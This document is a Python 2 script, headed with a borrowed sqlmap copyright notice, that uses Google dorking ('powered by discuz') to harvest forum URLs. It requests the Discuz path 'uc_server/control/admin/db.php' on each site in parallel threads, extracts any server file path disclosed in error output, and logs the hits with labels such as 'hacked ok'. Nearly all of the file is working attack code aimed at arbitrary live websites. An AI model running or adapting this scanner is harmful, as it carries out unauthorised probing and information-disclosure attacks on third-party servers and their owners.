#!/usr/bin/env python
#coding=utf-8

"""
$Id: google.py 3273 2011-02-08 00:02:54Z inquisb $

Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""


import re
import socket
import urllib2
import threading

from time import ctime

class MyThread(threading.Thread):
    """
    custom threading
    """

    def __init__(self,func,args):
        threading.Thread.__init__(self)
        self.func = func
        self.args = args
    
    def run(self):
        self.res = self.func(*self.args)


def readHtml(url,flag = 0):
    """
    request the url,and back html src
    """
    socket.setdefaulttimeout(40)
    src = ''
    try:
        request = urllib2.Request(url)
        request.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.825.0 Safari/535.1')
        opener = urllib2.build_opener()
        response = opener.open(request)
        src = response.read()
    except Exception,e:
        log(url + '  --->  ' + str(e) + '\n',0)
        print e
        pass

    if flag and src:
        regExpr = r'in <b>([\S\s]+.php)</b>'
        print 'hacking at ' + url
        if 'adminbase' in src:
            matches = re.findall(regExpr, src, re.I | re.M)
            log(url + '  ===>  ' + matches[0] + '\n')
            print 'ok'
        else:
            log(url +' ---> path not found\n',2)
            print 'None'






    return src


def parsePage(page):
    """
    Parse Google dork search results page to get the list of
    HTTP addresses
    """

    matches = []

    regExpr = r'h3 class="?r"?><a href="(http[s]?://[^"]+?)"[\s\S]+?class="?l"?'
    matches = re.findall(regExpr, page, re.I | re.M)

    return matches

def search(googleDork,gpage=0):
    """
    This method performs the effective search on Google providing
    the google dork and the Google session cookie
    """
    gpage = gpage if gpage else 10000  
    
    if not googleDork:
        return None
    for i in xrange(gpage):
        print "using Google result page #%d" % i

        url  = "http://www.google.com/search?"
        url += "q=%s&num=100&safe=off&filter=0" % googleDork.replace(' ','+')
        url += "&qscrl=1&start=%d" % (i * 100)
        page = readHtml(url)
        matches = parsePage(page)
        #print matches

        attack(matches)


def attack(lst):
    """
    This method is to attack the urls in lst
    """
    s = 'uc_server/control/admin/db.php'

    if lst is not None: 
        target = [i + s if i[-1] == '/' else i[:i.rindex('/') + 1] + s for i in set(lst)]

        threads = []
        n = len(target)

        for i in target:
            t = MyThread(readHtml,(i,1))
            threads.append(t)

        for i in xrange(n):
            threads[i].start()

        for i in xrange(n):
            threads[i].join()

     

def log(s,flag = 1):
    """
    flag = 1    hacked ok
    flag = 0    error
    flag = 2    path not found
    """
    path = {0:'error.txt',1:'discuz_path.txt',2:'not_found.txt'}
    f = open(path[flag],'a')
    s ='[' +  str(ctime()) + ']'+ s
    f.write(s)
    f.close()

if __name__ == '__main__':
    a = search('powered by discuz') 
    attack(a)
